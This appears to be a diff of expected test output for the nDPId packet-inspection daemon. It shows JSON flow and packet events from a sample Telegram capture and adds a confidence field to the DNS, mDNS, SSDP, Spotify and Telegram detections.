 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1588779607308,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"ts_msec":1588779607308,"pkt":"MzMAAAD7wJrQLWJ0ht1gBqDxAGwR\/\/6AAAAAAAAAGKCkEok1wBv\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsCTwAAAAAAAEAAQAAAAEMX3NsZWVwLXByb3h5BF91ZHAFbG9jYWwAAAwAAcAMAAwAAQAAEZEAEg81MC0zNS0xMC03MC4xIDHADAAAKQWgAAARlAASAAQADgAx4prQLWJ0wJrQLWJ0"}
-00673{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779603292,"flow_last_seen":1588779607308,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1588779607308,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}}
+00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779603292,"flow_last_seen":1588779607308,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1588779607308,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779607374,"flow_last_seen":1588779607374,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1588779607374,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1588779607374,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1588779607374,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA9u6QAAP8RfGzAqAFNwKgBAcuWADUAKd8a0oUBAAABAAAAAAAAAmluCWFwcGNlbnRlcgJtcwAAAQAB"}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779607374,"flow_last_seen":1588779607374,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1588779607374,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779607374,"flow_last_seen":1588779607374,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1588779607374,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1588779607388,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1588779607388,"pkt":"KDc3AG3IEBMx8Tl2CABFAADD2ppAADkR4vDAqAEBwKgBTQA1y5YArwAA0oWBgAABAAMAAAAAAmluCWFwcGNlbnRlcgJtcwAAAQABwAwABQABAAAAXQAuGWluMi1wcm9kLWVhc3QtdXMyLTIzZmEzMzAOdHJhZmZpY21hbmFnZXIDbmV0AMAtAAUAAQAAAAsAMBNpbjItZ3cyLTA0LWVkZTZmMDZlB2Vhc3R1czIIY2xvdWRhcHAFYXp1cmUDY29tAMBnAAEAAQAAAAUABBQsTvs="}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779607388,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"20.44.78.251"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779607388,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"20.44.78.251"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779608134,"flow_last_seen":1588779608134,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779608134,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1588779608134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779608134,"pkt":"\/\/\/\/\/\/\/\/wJrQLWJ0CABFAABEQD4AAEARtebAqAE1wKgB\/+EV4RUAMNBmU3BvdFVkcDClWtsnvt2XzwABAACyJIr8D\/N2Z9WO7tpCHKgrvJhaBg=="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779608134,"flow_last_seen":1588779608134,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779608134,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779608134,"flow_last_seen":1588779608134,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779608134,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1588779611135,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779611135,"pkt":"\/\/\/\/\/\/\/\/wJrQLWJ0CABFAABE4wYAAEAREx7AqAE1wKgB\/+EV4RUAMNBmU3BvdFVkcDClWtsnvt2XzwABAACyJIr8D\/N2Z9WO7tpCHKgrvJhaBg=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779611355,"flow_last_seen":1588779611355,"flow_idle_time":180000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":125,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1588779611355,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1588779611355,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"ts_msec":1588779611355,"pkt":"AQBef\/\/6jP5XIzfkCABFAACZH80AAAER55nAqAFL7\/\/\/+uI8B2wAhTXETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779611355,"flow_last_seen":1588779611355,"flow_idle_time":180000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":125,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1588779611355,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779611355,"flow_last_seen":1588779611355,"flow_idle_time":180000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":125,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1588779611355,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1588779611458,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"ts_msec":1588779611458,"pkt":"AQBef\/\/6jP5XIzfkCABFAACZnzoAAAERaCzAqAFL7\/\/\/+uI8B2wAhTXETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="}
 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1588779611657,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"ts_msec":1588779611657,"pkt":"AQBef\/\/6jP5XIzfkCABFAACZ2TYAAAERLjDAqAFL7\/\/\/+uI8B2wAhTXETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615019,"flow_last_seen":1588779615019,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1588779615019,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1588779615019,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1588779615019,"pkt":"EBMx8Tl2KDc3AG3ICABFAABHiDkAAP8Rr83AqAFNwKgBAe7AADUAMxxUuQsBAAABAAAAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAQ=="}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615019,"flow_last_seen":1588779615019,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1588779615019,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615019,"flow_last_seen":1588779615019,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1588779615019,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1588779615032,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1588779615032,"pkt":"KDc3AG3IEBMx8Tl2CABFAABXJ0xAADkRlqvAqAEBwKgBTQA17sAAQwAAuQuBgAABAAEAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAA4ABFx69t8="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779615032,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779615032,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1588779615961,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1588779615961,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1588779615961,"pkt":"AQBeAAD78KNaMBgSCABFAABNRwcAAP8R0cDAqAE04AAA+xTpFOkAOcUdAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAyAAQhfYWlycGxhecASAAyAAQ=="}
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1588779615961,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1588779615961,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1588779615962,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1588779615962,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"ts_msec":1588779615962,"pkt":"MzMAAAD78KNaMBgSht1gBhFuADkR\/\/6AAAAAAAAABNzt7FsMpmH\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5dUAAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"}
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1588779615962,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
+00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1588779615962,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABERC0AAEARERTAqAFNW2wIB1qGAgkAMLAM3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8o+UYRJgGi8A=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
